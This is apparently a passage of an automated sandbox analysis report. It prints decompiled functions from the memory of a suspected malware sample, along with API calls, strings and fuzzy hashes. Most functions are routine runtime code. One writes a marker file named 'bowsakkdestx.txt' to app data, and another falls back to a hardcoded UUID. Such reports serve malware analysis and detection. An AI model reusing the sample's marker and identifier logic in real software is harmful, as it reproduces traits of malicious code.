                                                                                    										return _t238;
                                                                                    									}
                                                                                    								}
                                                                                    							} else {
                                                                                    								__eflags = _t221;
                                                                                    								if(_t221 == 0) {
                                                                                    									L44:
                                                                                    									return _t238;
                                                                                    								} else {
                                                                                    									goto L26;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				} else {
                                                                                    					_t204 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                    					if(_t204 < 0x10) {
                                                                                    						_t171 = __ecx;
                                                                                    					} else {
                                                                                    						_t171 =  *((intOrPtr*)(__ecx));
                                                                                    					}
                                                                                    					if(_t206 < _t171) {
                                                                                    						goto L13;
                                                                                    					} else {
                                                                                    						if(_t204 < 0x10) {
                                                                                    							_t221 = _t238;
                                                                                    						} else {
                                                                                    							_t221 =  *_t238;
                                                                                    						}
                                                                                    						if( *((intOrPtr*)(_t238 + 0x10)) + _t221 <= _t206) {
                                                                                    							goto L13;
                                                                                    						} else {
                                                                                    							if(_t204 < 0x10) {
                                                                                    								_t174 = _t238;
                                                                                    							} else {
                                                                                    								_t174 =  *_t238;
                                                                                    							}
                                                                                    							return E00418000(_t176, _t238, _t221, _t238, _a4, _a8, _t238, _t206 - _t174, _a16);
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}




























































                                                                                    0x00417e4f
                                                                                    0x00417e55
                                                                                    0x00417e5a
                                                                                    0x00417e5c
                                                                                    0x00417e5e
                                                                                    0x00417e61
                                                                                    0x00417e63
                                                                                    0x00417ea6
                                                                                    0x00417e65
                                                                                    0x00417e65
                                                                                    0x00417e68
                                                                                    0x00417e6b
                                                                                    0x00417e71
                                                                                    0x00417e6d
                                                                                    0x00417e6d
                                                                                    0x00417e6d
                                                                                    0x00417e73
                                                                                    0x00417e76
                                                                                    0x00417e7f
                                                                                    0x00417e78
                                                                                    0x00417e7a
                                                                                    0x00417e7a
                                                                                    0x00417e8a
                                                                                    0x00417e99
                                                                                    0x00417e9e
                                                                                    0x00417ea1
                                                                                    0x00417ea1
                                                                                    0x00417ea9
                                                                                    0x00417ead
                                                                                    0x00417eb3
                                                                                    0x00417eaf
                                                                                    0x00417eaf
                                                                                    0x00417eaf
                                                                                    0x00417eb5
                                                                                    0x00417eb7
                                                                                    0x00417ec2
                                                                                    0x00417ec7
                                                                                    0x00417ecf
                                                                                    0x00417ecf
                                                                                    0x00417e40
                                                                                    0x00417e40
                                                                                    0x00417e42
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00417e42
                                                                                    0x00417edc
                                                                                    0x00417edc
                                                                                    0x00417ddc
                                                                                    0x00417d61
                                                                                    0x00417d61
                                                                                    0x00417d64
                                                                                    0x00417d67
                                                                                    0x00417d6d
                                                                                    0x00417d69
                                                                                    0x00417d69
                                                                                    0x00417d69
                                                                                    0x00417d6f
                                                                                    0x00417d71
                                                                                    0x00000000
                                                                                    0x00417d73
                                                                                    0x00417d73
                                                                                    0x00417d76
                                                                                    0x00417d7c
                                                                                    0x00417d78
                                                                                    0x00417d78
                                                                                    0x00417d78
                                                                                    0x00417d7e
                                                                                    0x00417d84
                                                                                    0x00417d86
                                                                                    0x00000000
                                                                                    0x00417d88
                                                                                    0x00417d88
                                                                                    0x00417d8b
                                                                                    0x00417d91
                                                                                    0x00417d8d
                                                                                    0x00417d8d
                                                                                    0x00417d8d
                                                                                    0x00417d96
                                                                                    0x00417dae
                                                                                    0x00417dae
                                                                                    0x00417d86
                                                                                    0x00417d71
                                                                                    0x00417c29
                                                                                    0x00417c29
                                                                                    0x00417c2b
                                                                                    0x00417c2e
                                                                                    0x00417c30
                                                                                    0x00417c32
                                                                                    0x00417c35
                                                                                    0x00417c38
                                                                                    0x00417c41
                                                                                    0x00417c3a
                                                                                    0x00417c3c
                                                                                    0x00417c3c
                                                                                    0x00417c44
                                                                                    0x00417c47
                                                                                    0x00417c50
                                                                                    0x00417c49
                                                                                    0x00417c4b
                                                                                    0x00417c4b
                                                                                    0x00417c53
                                                                                    0x00417c55
                                                                                    0x00417c67
                                                                                    0x00417c6a
                                                                                    0x00417c6f
                                                                                    0x00417c6f
                                                                                    0x00417c55
                                                                                    0x00417c72
                                                                                    0x00417c74
                                                                                    0x00417c7e
                                                                                    0x00417c87
                                                                                    0x00417c8a
                                                                                    0x00417c8d
                                                                                    0x00417c92
                                                                                    0x00417c94
                                                                                    0x00000000
                                                                                    0x00417c9a
                                                                                    0x00417c9a
                                                                                    0x00417c9c
                                                                                    0x00417c9e
                                                                                    0x00417ca1
                                                                                    0x00417ca4
                                                                                    0x00417cad
                                                                                    0x00417ca6
                                                                                    0x00417ca8
                                                                                    0x00417ca8
                                                                                    0x00417cb0
                                                                                    0x00417cb3
                                                                                    0x00417cb9
                                                                                    0x00417cb5
                                                                                    0x00417cb5
                                                                                    0x00417cb5
                                                                                    0x00417cbb
                                                                                    0x00417cbe
                                                                                    0x00417cc0
                                                                                    0x00417cd1
                                                                                    0x00417cd4
                                                                                    0x00417cd9
                                                                                    0x00417cd9
                                                                                    0x00417cc0
                                                                                    0x00417cdc
                                                                                    0x00417ce0
                                                                                    0x00417ce6
                                                                                    0x00417ce2
                                                                                    0x00417ce2
                                                                                    0x00417ce2
                                                                                    0x00417ce8
                                                                                    0x00417cea
                                                                                    0x00417cf3
                                                                                    0x00417cf6
                                                                                    0x00417cfb
                                                                                    0x00417cfe
                                                                                    0x00417d02
                                                                                    0x00417d05
                                                                                    0x00417d08
                                                                                    0x00417d1d
                                                                                    0x00000000
                                                                                    0x00417d0a
                                                                                    0x00417d0e
                                                                                    0x00417d18
                                                                                    0x00417d18
                                                                                    0x00417d08
                                                                                    0x00417c76
                                                                                    0x00417c76
                                                                                    0x00417c78
                                                                                    0x00417d21
                                                                                    0x00417d29
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00417c78
                                                                                    0x00417c74
                                                                                    0x00417c23
                                                                                    0x00417baf
                                                                                    0x00417baf
                                                                                    0x00417bb5
                                                                                    0x00417bbb
                                                                                    0x00417bb7
                                                                                    0x00417bb7
                                                                                    0x00417bb7
                                                                                    0x00417bbf
                                                                                    0x00000000
                                                                                    0x00417bc1
                                                                                    0x00417bc4
                                                                                    0x00417bca
                                                                                    0x00417bc6
                                                                                    0x00417bc6
                                                                                    0x00417bc6
                                                                                    0x00417bd3
                                                                                    0x00000000
                                                                                    0x00417bd5
                                                                                    0x00417bd8
                                                                                    0x00417bde
                                                                                    0x00417bda
                                                                                    0x00417bda
                                                                                    0x00417bda
                                                                                    0x00417bf9
                                                                                    0x00417bf9
                                                                                    0x00417bd3
                                                                                    0x00417bbf

                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 4104443479-4289949731
                                                                                    • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                    • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                                                                                    • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                                                                                    • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 60%
                                                                                    			E00414160(signed int __eax, void* __ebx, intOrPtr* __ecx, signed int __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                    				intOrPtr _v8;
                                                                                    				intOrPtr* _v20;
                                                                                    				void* __ebp;
                                                                                    				intOrPtr* _t24;
                                                                                    				intOrPtr _t31;
                                                                                    				intOrPtr* _t34;
                                                                                    				intOrPtr _t38;
                                                                                    				intOrPtr* _t39;
                                                                                    				intOrPtr* _t48;
                                                                                    				intOrPtr* _t51;
                                                                                    				intOrPtr _t53;
                                                                                    				intOrPtr* _t56;
                                                                                    				intOrPtr* _t57;
                                                                                    				signed int _t59;
                                                                                    				void* _t60;
                                                                                    				intOrPtr* _t63;
                                                                                    				void* _t67;
                                                                                    
                                                                                    				_push(__ecx);
                                                                                    				_push(__ebx);
                                                                                    				_t63 = __ecx;
                                                                                    				_push(__edi);
                                                                                    				_t59 = __edi | 0xffffffff;
                                                                                    				_t51 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                    				if(_t51 < _a4) {
                                                                                    					L32:
                                                                                    					_push("invalid string position");
                                                                                    					E0044F26C(__eflags);
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					asm("int3");
                                                                                    					__eflags =  *((intOrPtr*)(_t51 + 0x14)) - 0x10;
                                                                                    					_t24 = _v20;
                                                                                    					if( *((intOrPtr*)(_t51 + 0x14)) >= 0x10) {
                                                                                    						_t51 =  *_t51;
                                                                                    					}
                                                                                    					 *_t24 = _t51;
                                                                                    					return _t24;
                                                                                    				} else {
                                                                                    					_t48 = _a8;
                                                                                    					_t5 = _t48 + 0x10; // 0xcccccccc
                                                                                    					_t60 =  <  ?  *_t5 : _t59;
                                                                                    					if((__eax | 0xffffffff) - _t51 <= _t60) {
                                                                                    						_push("string too long");
                                                                                    						E0044F23E(__eflags);
                                                                                    						goto L32;
                                                                                    					} else {
                                                                                    						if(_t60 != 0) {
                                                                                    							_push(0);
                                                                                    							_v8 = _t51 + _t60;
                                                                                    							if(E00415810(_t48, __ecx, _t60, _t51 + _t60) != 0) {
                                                                                    								_t31 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                    								if(_t31 < 0x10) {
                                                                                    									_a8 = __ecx;
                                                                                    								} else {
                                                                                    									_a8 =  *__ecx;
                                                                                    								}
                                                                                    								if(_t31 < 0x10) {
                                                                                    									_t56 = _t63;
                                                                                    								} else {
                                                                                    									_t56 =  *_t63;
                                                                                    								}
                                                                                    								_t53 = _a4;
                                                                                    								_t33 =  *((intOrPtr*)(_t63 + 0x10)) != _t53;
                                                                                    								if( *((intOrPtr*)(_t63 + 0x10)) != _t53) {
                                                                                    									E004205A0(_t56 + _t53 + _t60, _a8 + _t53, _t33);
                                                                                    									_t53 = _a4;
                                                                                    									_t67 = _t67 + 0xc;
                                                                                    								}
                                                                                    								if(_t63 != _t48) {
                                                                                    									__eflags =  *((intOrPtr*)(_t48 + 0x14)) - 0x10;
                                                                                    									if( *((intOrPtr*)(_t48 + 0x14)) >= 0x10) {
                                                                                    										_t48 =  *_t48;
                                                                                    									}
                                                                                    									__eflags =  *((intOrPtr*)(_t63 + 0x14)) - 0x10;
                                                                                    									if( *((intOrPtr*)(_t63 + 0x14)) < 0x10) {
                                                                                    										_t34 = _t63;
                                                                                    									} else {
                                                                                    										_t34 =  *_t63;
                                                                                    									}
                                                                                    									__eflags = _t60;
                                                                                    									if(_t60 != 0) {
                                                                                    										__eflags = _t34 + _t53;
                                                                                    										E0042D8D0(_t34 + _t53, _t48, _t60);
                                                                                    										goto L28;
                                                                                    									}
                                                                                    								} else {
                                                                                    									_t38 =  *((intOrPtr*)(_t63 + 0x14));
                                                                                    									if(_t38 < 0x10) {
                                                                                    										_t57 = _t63;
                                                                                    									} else {
                                                                                    										_t57 =  *_t63;
                                                                                    									}
                                                                                    									if(_t38 < 0x10) {
                                                                                    										_t39 = _t63;
                                                                                    									} else {
                                                                                    										_t39 =  *_t63;
                                                                                    									}
                                                                                    									if(_t60 != 0) {
                                                                                    										E004205A0(_t39 + _t53, _t57, _t60);
                                                                                    										L28:
                                                                                    									}
                                                                                    								}
                                                                                    								E00414460(_t63, _v8);
                                                                                    							}
                                                                                    						}
                                                                                    						return _t63;
                                                                                    					}
                                                                                    				}
                                                                                    			}





















                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: invalid string position$string too long
                                                                                    • API String ID: 4104443479-4289949731
                                                                                    • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                    • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                                                                                    • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                                                                                    • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 96%
                                                                                    			E0045AD50(void* __ebx, void* __edx, void* __ebp, char _a4, char _a8) {
                                                                                    				void* __edi;
                                                                                    				intOrPtr _t17;
                                                                                    				intOrPtr _t18;
                                                                                    				signed int _t36;
                                                                                    				intOrPtr _t44;
                                                                                    				intOrPtr* _t45;
                                                                                    				intOrPtr _t46;
                                                                                    
                                                                                    				_t48 = __ebp;
                                                                                    				_t1 =  &_a8; // 0x463743
                                                                                    				_t46 =  *_t1;
                                                                                    				_t2 =  &_a4; // 0x463743
                                                                                    				_t45 =  *_t2;
                                                                                    				_t39 =  *_t45;
                                                                                    				if( *_t45 >= _t46) {
                                                                                    					L3:
                                                                                    					 *_t45 = _t46;
                                                                                    					return _t46;
                                                                                    				} else {
                                                                                    					if( *(_t45 + 8) < _t46) {
                                                                                    						__eflags = _t46 - 0x5ffffffc;
                                                                                    						if(__eflags <= 0) {
                                                                                    							_t17 =  *((intOrPtr*)(_t45 + 4));
                                                                                    							_push(__ebx);
                                                                                    							_t36 = 0xaaaaaaab * (_t46 + 3) >> 0x20 >> 1 << 2;
                                                                                    							__eflags = _t17;
                                                                                    							if(_t17 != 0) {
                                                                                    								_t18 = E00454F30(_t17, _t36, ".\\crypto\\buffer\\buffer.c", 0x7b);
                                                                                    							} else {
                                                                                    								_t18 = E00454E50(_t36, ".\\crypto\\buffer\\buffer.c", 0x79);
                                                                                    							}
                                                                                    							_t44 = _t18;
                                                                                    							__eflags = _t44;
                                                                                    							if(__eflags != 0) {
                                                                                    								__eflags = _t46 -  *_t45;
                                                                                    								 *((intOrPtr*)(_t45 + 4)) = _t44;
                                                                                    								 *(_t45 + 8) = _t36;
                                                                                    								E0042B420( *_t45 + _t44, 0, _t46 -  *_t45);
                                                                                    								 *_t45 = _t46;
                                                                                    								return _t46;
                                                                                    							} else {
                                                                                    								E004512D0(_t36, _t44, _t45, _t48, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x7e);
                                                                                    								__eflags = 0;
                                                                                    								return 0;
                                                                                    							}
                                                                                    						} else {
                                                                                    							E004512D0(__ebx, __edx, _t45, __ebp, __eflags, 7, 0x64, 0x41, ".\\crypto\\buffer\\buffer.c", 0x74);
                                                                                    							__eflags = 0;
                                                                                    							return 0;
                                                                                    						}
                                                                                    					} else {
                                                                                    						E0042B420( *((intOrPtr*)(_t45 + 4)) + _t39, 0, _t46 - _t39);
                                                                                    						goto L3;
                                                                                    					}
                                                                                    				}
                                                                                    			}











                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _memset
                                                                                    • String ID: .\crypto\buffer\buffer.c$C7F
                                                                                    • API String ID: 2102423945-2013712220
                                                                                    • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                    • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                                                                                    • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                                                                                    • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 23%
                                                                                    			E0040C5C0(void* __ebx, char* __ecx) {
                                                                                    				intOrPtr _v20;
                                                                                    				char _v24;
                                                                                    				intOrPtr _v36;
                                                                                    				char _v40;
                                                                                    				char _v44;
                                                                                    				char _v48;
                                                                                    				char _v52;
                                                                                    				char _v56;
                                                                                    				intOrPtr* _v64;
                                                                                    				char _v72;
                                                                                    				intOrPtr _v76;
                                                                                    				void* __edi;
                                                                                    				char* _t19;
                                                                                    				intOrPtr _t24;
                                                                                    				void* _t31;
                                                                                    				intOrPtr* _t34;
                                                                                    				void* _t35;
                                                                                    				intOrPtr* _t38;
                                                                                    				void* _t39;
                                                                                    				void* _t42;
                                                                                    				char* _t43;
                                                                                    
                                                                                    				_t31 = __ebx;
                                                                                    				_t19 =  &_v44;
                                                                                    				_v48 = 0;
                                                                                    				_t43 = __ecx;
                                                                                    				__imp__UuidCreate(_t19, _t39, _t42);
                                                                                    				if(_t19 != 0) {
                                                                                    					L9:
                                                                                    					_push(0x24);
                                                                                    					 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                                                                    					 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                                                                    					 *_t43 = 0;
                                                                                    					E004156D0(_t31, _t43, _t39, "8a4577dc-de55-4eb5-b48a-8a3eee60cd95");
                                                                                    					goto L10;
                                                                                    				} else {
                                                                                    					_v56 = _t19;
                                                                                    					__imp__UuidToStringA( &_v48,  &_v56);
                                                                                    					_t38 = _v64;
                                                                                    					if(_t38 == 0) {
                                                                                    						goto L9;
                                                                                    					} else {
                                                                                    						_v20 = 0xf;
                                                                                    						_v24 = 0;
                                                                                    						_v40 = 0;
                                                                                    						if( *_t38 != 0) {
                                                                                    							_t34 = _t38;
                                                                                    							_t39 = _t34 + 1;
                                                                                    							do {
                                                                                    								_t24 =  *_t34;
                                                                                    								_t34 = _t34 + 1;
                                                                                    							} while (_t24 != 0);
                                                                                    							_t35 = _t34 - _t39;
                                                                                    						} else {
                                                                                    							_t35 = 0;
                                                                                    						}
                                                                                    						E004156D0(_t31,  &_v40, _t39, _t38);
                                                                                    						__imp__RpcStringFreeA( &_v72, _t35);
                                                                                    						_v76 = 0;
                                                                                    						E00412CA0(_t43,  &_v52);
                                                                                    						if(_v36 < 0x10) {
                                                                                    							L10:
                                                                                    							return _t43;
                                                                                    						} else {
                                                                                    							L00422587(_v48);
                                                                                    							return _t43;
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}

























                                                                                    APIs
                                                                                    Strings
                                                                                    • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: StringUuid$CreateFree
                                                                                    • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                    • API String ID: 3044360575-2335240114
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00437A2D(char _a4, intOrPtr _a8) {
                                                                                    				intOrPtr _t12;
                                                                                    				short* _t28;
                                                                                    
                                                                                    				_t28 = _a4;
                                                                                    				if(_t28 != 0 &&  *_t28 != 0 && E00437413(_t28, ?str?) != 0) {
                                                                                    					if(E00437413(_t28, ?str?) != 0) {
                                                                                    						return E00423C92(_t28);
                                                                                    					}
                                                                                    					if(E0043884E(_a8 + 0x250, 0x2000000b,  &_a4, 2) == 0) {
                                                                                    						L9:
                                                                                    						return 0;
                                                                                    					}
                                                                                    					return _a4;
                                                                                    				}
                                                                                    				if(E0043884E(_a8 + 0x250, 0x20001004,  &_a4, 2) == 0) {
                                                                                    					goto L9;
                                                                                    				}
                                                                                    				_t12 = _a4;
                                                                                    				if(_t12 == 0) {
                                                                                    					return GetACP();
                                                                                    				}
                                                                                    				return _t12;
                                                                                    			}






                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _wcscmp
                                                                                    • String ID: ACP$OCP
                                                                                    • API String ID: 856254489-711371036
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 47%
                                                                                    			E0040C470(void* __ebx, CHAR* __ecx, void* __edx) {
                                                                                    				char _v264;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				char* _t4;
                                                                                    				void* _t17;
                                                                                    				CHAR* _t18;
                                                                                    				void* _t20;
                                                                                    
                                                                                    				_t17 = __edx;
                                                                                    				_t4 =  &_v264;
                                                                                    				_t18 = __ecx;
                                                                                    				__imp__SHGetFolderPathA(0, 0x1c, 0, 0, _t4);
                                                                                    				if(_t4 >= 0) {
                                                                                    					PathAppendA( &_v264, "bowsakkdestx.txt");
                                                                                    					_t20 = E004220B6( &_v264, "w");
                                                                                    					__eflags = _t20;
                                                                                    					if(__eflags != 0) {
                                                                                    						_push(_t20);
                                                                                    						_push(lstrlenA(_t18));
                                                                                    						_push(1);
                                                                                    						_push(_t18);
                                                                                    						E00422B02(__ebx, _t17, _t18, _t20, __eflags);
                                                                                    						_push(_t20);
                                                                                    						E00423A38(__ebx, _t18, _t20, __eflags);
                                                                                    						return 1;
                                                                                    					} else {
                                                                                    						__eflags = 0;
                                                                                    						return 0;
                                                                                    					}
                                                                                    				} else {
                                                                                    					return 0;
                                                                                    				}
                                                                                    			}












                                                                                    APIs
                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Path$AppendFolder
                                                                                    • String ID: bowsakkdestx.txt
                                                                                    • API String ID: 29327785-2616962270
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 90%
                                                                                    			E00423B4C(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                                                    				char* _v16;
                                                                                    				char _v28;
                                                                                    				signed char _v32;
                                                                                    				void* _t10;
                                                                                    				void* _t19;
                                                                                    				intOrPtr* _t22;
                                                                                    				void* _t24;
                                                                                    				void* _t25;
                                                                                    				intOrPtr* _t27;
                                                                                    
                                                                                    				_t25 = __edi;
                                                                                    				_t24 = __edx;
                                                                                    				_t19 = __ebx;
                                                                                    				while(1) {
                                                                                    					_t10 = E00420C62(_t19, _t24, _t25, _a4);
                                                                                    					if(_t10 != 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					if(E0042793D(_t10, _a4) == 0) {
                                                                                    						_push(1);
                                                                                    						_v16 = "bad allocation";
                                                                                    						_t22 =  &_v28;
                                                                                    						E00430D21(_t22,  &_v16);
                                                                                    						_v28 = 0x4cf748;
                                                                                    						E00430ECA( &_v28, 0x50793c);
                                                                                    						asm("int3");
                                                                                    						_t27 = _t22;
                                                                                    						 *_t27 = 0x4cf748;
                                                                                    						E00430D91(_t22);
                                                                                    						if((_v32 & 0x00000001) != 0) {
                                                                                    							L00422587(_t27);
                                                                                    						}
                                                                                    						return _t27;
                                                                                    					} else {
                                                                                    						continue;
                                                                                    					}
                                                                                    					L7:
                                                                                    				}
                                                                                    				return _t10;
                                                                                    				goto L7;
                                                                                    			}













                                                                                    APIs
                                                                                    • _malloc.LIBCMT ref: 00423B64
                                                                                      • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                                                                                      • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                                                                                      • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(006D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                                                                                    • std::exception::exception.LIBCMT ref: 00423B82
                                                                                    • __CxxThrowException@8.LIBCMT ref: 00423B97
                                                                                      • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                                                                                    • String ID: bad allocation
                                                                                    • API String ID: 3074076210-2104205924
                                                                                    • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                    • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                                                                                    • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                                                                                    • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E0041BA10(intOrPtr __ecx) {
                                                                                    				struct _WNDCLASSEXW _v52;
                                                                                    
                                                                                    				_v52.cbSize = 0x30;
                                                                                    				_v52.style = 3;
                                                                                    				_v52.lpfnWndProc =  &M0041BAE0;
                                                                                    				_v52.cbClsExtra = 0;
                                                                                    				_v52.cbWndExtra = 0;
                                                                                    				_v52.hInstance = __ecx;
                                                                                    				_v52.hIcon = 0;
                                                                                    				_v52.hCursor = LoadCursorW(0, 0x7f00);
                                                                                    				_v52.hbrBackground = 6;
                                                                                    				_v52.lpszMenuName = 0;
                                                                                    				_v52.lpszClassName = L"LPCWSTRszWindowClass";
                                                                                    				_v52.hIconSm = 0;
                                                                                    				return RegisterClassExW( &_v52);
                                                                                    			}





                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                                                                                    • RegisterClassExW.USER32 ref: 0041BA73
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
